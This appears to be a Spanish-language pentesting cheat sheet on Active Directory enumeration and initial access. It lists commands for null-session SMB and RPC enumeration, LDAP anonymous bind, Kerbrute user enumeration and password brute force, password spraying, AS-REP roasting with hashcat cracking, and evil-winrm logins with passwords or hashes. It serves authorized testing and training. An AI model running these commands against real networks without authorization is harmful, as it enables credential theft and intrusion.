BlogTwitterLinkedIn

🔷Enumeración Básica

Enumeración de Active Directory para obtener un acceso inicial

Mapping Network

Host Discovery

fping
fping -agp <ip-range>
nmap ping scan
nmap -sn <ip-range>

Port Scanning

Puertos y Protocolos comunes en AD
Puerto
Protocolo
Enfoque

88

Kerberos

Potencial enumeración de Kerberos

135

MS-RPC

Potencial enumeración RPC (null sessions)

139

SMB/NetBIOS

Acceso SMB heredado

389

LDAP

Peticiones LDAP a AD

445

SMB

Acceso SMB moderno, fundamental para enumeración

464

Kerberos (kpasswd)

Servicio Kerberos relacionado con contraseñas

nmap SYN scan a todos los puertos
nmap -sS -p- -T3 -iL hosts.txt -oN full-nmap.txt
nmap específico a servicios y versiones
nmap -p <ports> -sCV -iL hosts.txt

Network Enumeration - SMB

Listing SMB Shares

Comprobar null session
smbclient -L //<ip> -N
Listar permisos de shares
smbmap -H <ip>
nmap -p 445 --script smb-enum-shares <ip>

Accessing SMB Shares

Acceder a share con null session
smbclient //<ip>/<share-name> -N
Acceder con credenciales
smbclient //<ip>/<share-name> --user=<username> --password=<pass> -W <domain>

Domain Enumeration

LDAP Enumeration

Comprobar si Anonymous Bind está habilitado
ldapsearch -x -H ldap://<ip> -s base
# Da bastante ouput si está habilitado
Solicitar información de usuarios - Anonymous Bind
ldapsearch -x -H ldap://<ip> -b "<dc=name,dc=name...>" "(objectClass=person)"
Extraer información de usuarios + descripciones
nxc ldap <ip> -u "uwu" -p "" --users

Enum4linux-ng

Obtener información sobre el DC
enum4linux-ng -A <ip>

RPC Enumeration via Null Session

rpcclient -U "" <ip> -N # verificar acceso RPC con null session
> enumdomusers # enumerar usuarios y RID
> help # lista comandos disponibles
Script para solicitar individualmente cada RID de usuario
for i in $(seq 500 2000); do echo "queryuser $i" |rpcclient -U "" -N <ip> 2>/dev/null | grep -i "User Name"; done

Username Enumeration with Kerbrute

LogoGitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub
Enumeración de usuarios por fuerza bruta contra Kerberos
./kerbrute userenum --dc <ip> -d <domain-name> users.txt
# users.txt = lista de potenciales usuarios recogidos con rpcclient/enum4linux-ng
LogoSecLists/Usernames/Names/names.txt at master · danielmiessler/SecListsGitHub
Wordlist de nombres comunes por si no hubieramos podido listar usuarios válidos

Kerbrute Password Bruteforce

kerbrute bruteuser --dc <ip> -d <domain> passes.txt <username>

Password Spraying

Password Policy Check

rpcclient

Solicitar política de contraseñas al DC
rpcclient -U "" <ip> -N
> getdompwinfo

crackmapexec

Obtener política de contraseñas
crackmapexec smb <ip> --pass-pol

Password Spraying Attack with CrackMapExec

crackmapexec smb <ip> -u users.txt -p passwords.txt

AS-REP Roasting

Enumeración - UF_DONT_REQUIRE_PREAUTH

Enumeración de usuarios vulnerables y recopilación de hashes AS-REP
impacket-GetNPUsers <domain-name>/ -dc-ip <ip> -usersfile users.txt -format hashcat -outputfile hashes.txt -no-pass

Explotación

Desencriptado en modo hash AS-REP de Kerberos
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

Sesión Windows Remota

Comprobar credenciales
netexec winrm <computer>.<domain> -u <username> -p '<password>'
Iniciar sesión remota con password
evil-winrm -i <ip> -u <username> -p '<password>'
Iniciar sesión remota con hash
evil-winrm -i <ip> -u <username> -H '<hash>'

Última actualización